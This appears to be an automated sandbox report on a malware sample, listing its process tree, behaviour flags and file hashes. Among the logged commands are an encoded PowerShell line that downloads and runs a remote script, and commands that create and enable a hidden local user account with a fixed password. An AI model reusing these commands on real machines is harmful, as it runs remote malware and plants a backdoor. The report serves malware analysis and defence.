-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1300
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2848
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4076
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:1188
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:2848
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:3472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:188
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
5fd98d205c7de7af5ed82341da8cb621
SHA1ce18c2a3e25829ef7017c48b0193f9ed96304293
SHA25617061c224774fed1282505677200c13016a01711c9d66b01a83fb62483a52e87
SHA512ab3773366a74731820ccd77c32bdc744a996b2b4925dca95b7873282c9e68815bded221338d81d1b01502f3a6fd501a532bbf23cb3b50d090167181383827449
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
e8498786994f6fa8fc41e56a5fcd9548
SHA107b3bac8b1d638715716f2e9e259cf0bbbb870ce
SHA2568f45375b297c8f997c761a05559811d0f2ed9721a1c7bc98aa56270ff9c7789b
SHA5129186c5438da7a190f06437fe8e37ef1a15300871f8996242385fae8317f498ba355c91a94f487dda836895f99eac8c83cad03d23a8383f7e65edaa91db31766f
-
MD5
1f40172eba3b5579f8cc7eccc557eac1
SHA14a04161e88a51b9029f497cca84033aa84609f49
SHA256871d297b3961f15056068cffbf3d2cf85465a6cc8e4cf7adbcee9ba8c1ec2dcf
SHA512bbf73144805d73ee468a053bb4f5e2c94b71a705e2616960eb77a0cf29e02209c7551911de84e4eaba17165ac85ddb25f0847013654352c8f88e4a5593d19373
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
4c3eddd88e27613137f9fc37e4b264ca
SHA10d4557f4dd9afb549c244a21072ad3296113df53
SHA25637ca03b68da12b308b0d1562baabc3503db1e7cd03727a25ebe24db24b9744ab
SHA512f4bf682a65d4b2a94d8b1fff380df3fa792597c4b344c5cf0800af6a428583f81fe4cdb6114f9d40b7881a0e6754c2a3e8a6d7cb49a230ec7791ae4c3fc5b182
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b